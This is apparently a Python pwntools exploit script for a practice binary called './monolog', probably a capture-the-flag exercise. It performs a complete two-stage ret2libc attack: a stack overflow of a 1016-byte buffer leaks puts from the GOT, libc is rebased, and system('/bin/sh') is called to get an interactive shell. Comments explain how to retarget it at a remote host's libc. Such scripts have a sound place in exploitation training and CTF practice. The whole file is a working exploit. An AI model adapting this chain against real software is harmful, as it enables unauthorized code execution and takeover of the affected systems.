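"""Two-stage ret2libc exploit for ./monolog (32-bit, non-PIE binary assumed).

Stage 1 overflows the 1016-byte buffer to call puts(puts@GOT), leaking the
runtime address of puts, then returns into main for a second shot.  Stage 2
uses that leak to rebase system() and the "/bin/sh" string inside libc and
calls system("/bin/sh").

Offsets are read from the libc pwntools resolves for the *local* binary.  For
a remote target load the target's libc instead (``ELF("libc.so.6")``), or the
computed system/"/bin/sh" addresses will be wrong.
"""
import sys

from pwn import *

context.binary = binary = ELF("./monolog")

# Distance from the start of the overflowed buffer to the saved return address.
BUF_TO_RET = 1016

# pwntools returns None when it cannot find the libc the binary links against;
# without it every offset below would be computed from None and crash later.
if binary.libc is None:
    sys.exit("could not resolve a libc for ./monolog; check the loader/LD_LIBRARY_PATH")
libc = binary.libc


def chain(call, ret, arg):
    """Build a 32-bit cdecl ROP frame: padding, callee, return address, one argument."""
    return b"".join([b"A" * BUF_TO_RET, p32(call), p32(ret), p32(arg)])


def send_stage(p, payload):
    """Drive one round of the program's input loop with the given overflow payload."""
    # "-1" presumably sidesteps a length/index check on the following line — TODO confirm
    p.sendline(b"-1")
    p.sendline(payload)
    p.sendline(b"stop")


def main():
    p = process()

    # Stage 1: puts(puts@GOT) prints the resolved address of puts, then re-enter main.
    send_stage(p, chain(binary.plt["puts"], binary.sym["main"], binary.got["puts"]))
    p.recvuntil(b"monolog : ")
    p.recvuntil(b"\n\n")
    # Do NOT .strip() the leak: a leading whitespace byte is part of the address.
    # puts() stops at the first NUL, so pad a short leak instead of failing in u32().
    raw = p.recvline(keepends=False)[:4].ljust(4, b"\x00")
    leaked_puts = u32(raw)
    libc_base = leaked_puts - libc.sym["puts"]
    log.info(f"puts@libc = {leaked_puts:#x}, libc base = {libc_base:#x}")
    # A mapped libc is page-aligned; anything else means the leak was mis-parsed
    # or the offsets belong to a different libc build.
    if libc_base & 0xFFF:
        sys.exit(f"libc base {libc_base:#x} is not page-aligned; bad leak or wrong libc")

    system = libc_base + libc.sym["system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))

    # Stage 2: system("/bin/sh"); returning to main afterwards keeps the process
    # alive if the call fails instead of crashing it immediately.
    send_stage(p, chain(system, binary.sym["main"], binsh))
    p.recvrepeat(0.5)
    p.interactive()


if __name__ == "__main__":
    main()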